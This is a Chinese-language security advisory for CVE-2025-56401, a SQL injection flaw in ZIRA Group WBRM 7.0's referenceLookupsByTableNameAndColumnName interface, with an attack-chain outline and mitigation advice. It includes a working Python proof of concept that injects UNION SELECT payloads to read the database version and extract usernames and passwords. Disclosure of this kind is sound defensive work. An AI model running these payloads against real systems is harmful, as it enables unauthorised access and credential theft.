CVE-2025-56401 ZIRA Group WBRM 7.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-56401

漏洞类型

SQL注入

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ZIRA Group WBRM 7.0

漏洞概述

CVE-2025-56401是ZIRA Group开发的WBRM 7.0版本中存在的SQL注入漏洞。该漏洞位于referenceLookupsByTableNameAndColumnName功能中，由于应用程序对用户输入的数据库表名和列名参数缺乏充分的过滤和验证，攻击者可以通过构造恶意的SQL语句片段注入到后端数据库查询中。成功利用此漏洞可使攻击者在无需高权限的情况下（低权限账户即可），通过网络远程执行SQL注入攻击。CVSS 3.1评分为7.6，属于高危级别漏洞。攻击者利用该漏洞可获取数据库中的敏感信息，包括用户凭证、业务数据等高价值信息，甚至可能在特定条件下实现远程代码执行或完全控制数据库服务器。该漏洞的利用无需用户交互，攻击复杂度较低，对机密性影响高，对完整性和可用性影响较低。建议受影响的用户尽快采取修复措施。

技术细节

ZIRA Group WBRM 7.0的referenceLookupsByTableNameAndColumnName接口存在SQL注入漏洞。该功能允许用户通过指定表名和列名来查询参考数据，但未对输入参数进行严格的SQL语句过滤。攻击者可以在表名或列名参数中插入SQL运算符和语句，如UNION SELECT、AND条件判断等，使原本的查询语句结构被破坏，执行攻击者注入的恶意SQL代码。由于该接口的认证要求为低权限，攻击者只需拥有一个普通用户账户即可尝试利用此漏洞。漏洞的CVSS向量显示攻击向量为网络层面，无需用户交互。攻击成功后可导致机密性影响（高），攻击者能够读取数据库中的敏感数据；完整性和可用性影响为低，可能造成数据篡改或服务中断。

攻击链分析

STEP 1

步骤1

攻击者识别目标：发现目标系统运行ZIRA Group WBRM 7.0，并定位到referenceLookupsByTableNameAndColumnName接口

STEP 2

步骤2

获取低权限账户：攻击者获取或创建一个普通的低权限用户账户

STEP 3

步骤3

构造恶意Payload：在tableName或columnName参数中注入SQL语句，如使用UNION SELECT提取数据库版本、用户凭证等信息

STEP 4

步骤4

发送攻击请求：通过HTTP GET请求将构造的恶意参数发送到目标接口

STEP 5

步骤5

数据提取与利用：成功注入后，攻击者获取数据库敏感信息，可能进一步横向移动或提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-56401 SQL Injection PoC
# Target: ZIRA Group WBRM 7.0
# Vulnerability: SQL Injection in referenceLookupsByTableNameAndColumnName

import requests
import json

target_url = "http://target-server/wbrm/api/referenceLookupsByTableNameAndColumnName"

# Basic authentication with low-privilege account
auth = ('low_privilege_user', 'password')

# SQL Injection payload - extract database version
payload_table = "users' UNION SELECT NULL,version()--"
payload_column = "id"

params = {
    'tableName': payload_table,
    'columnName': payload_column
}

try:
    response = requests.get(
        target_url,
        params=params,
        auth=auth,
        timeout=10
    )
    
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    
    # If successful, the response may contain database version info
    if response.status_code == 200:
        print("\n[!] Possible SQL Injection - Check response for database info")
        
except requests.exceptions.RequestException as e:
    print(f"Error: {e}")

# Extract user credentials payload
payload_extract = "users' UNION SELECT NULL,username||':'||password FROM users--"
params_extract = {
    'tableName': payload_extract,
    'columnName': payload_column
}

try:
    response = requests.get(
        target_url,
        params=params_extract,
        auth=auth,
        timeout=10
    )
    print(f"\nExtraction Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Extraction Error: {e}")

影响范围

ZIRA Group WBRM 7.0

防御指南

临时缓解措施

在厂商发布修复版本之前，可采取以下临时缓解措施：1) 使用Web应用防火墙规则阻止包含SQL注入特征（如UNION、SELECT、--等关键字）的请求；2) 临时禁用referenceLookupsByTableNameAndColumnName功能；3) 对该接口实施更严格的访问控制，限制可访问的用户范围；4) 监控数据库查询日志，及时发现异常SQL语句；5) 考虑在应用层实现输入过滤，移除SQL特殊字符。